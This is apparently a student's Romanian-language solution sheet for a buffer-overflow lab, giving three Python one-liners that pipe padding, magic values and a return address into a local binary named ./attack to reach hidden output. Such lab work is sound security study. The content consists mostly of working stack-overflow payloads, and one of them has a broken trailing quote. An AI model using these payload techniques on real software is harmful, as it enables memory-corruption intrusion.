cu dragoste de la CA

a) arata string-ul Prickle rick bla bla

rezolvare a)
python -c 'print "A" * 64 + "\xbe\xba\xfe\xca"

b) arata string-ul Weddings bla bla

Nu poti sa dai return address daca tu in functia respectiva ai exit(1), trebuie sa treci
prin conditii astfel incat sa ai un return

rezolvare b)
python -c 'print "A" * 64 + "\xbe\xba\xfe\xca" + "A" * 4 + "\x82\x91\x04\x08" + "\n" + "A" * 72 + "\xef\xbe\xad\xde" + ' | ./attack 

c) arata string-ul ala lung din functia ascunsa hidden

rezolvare c)
python -c 'print "A" * 64 + "\xbe\xba\xfe\xca" + "\n" + "A" * 68 + "\x82\x91\x04\x08" + "\xef\xbe\xad\xde"' | ./attack  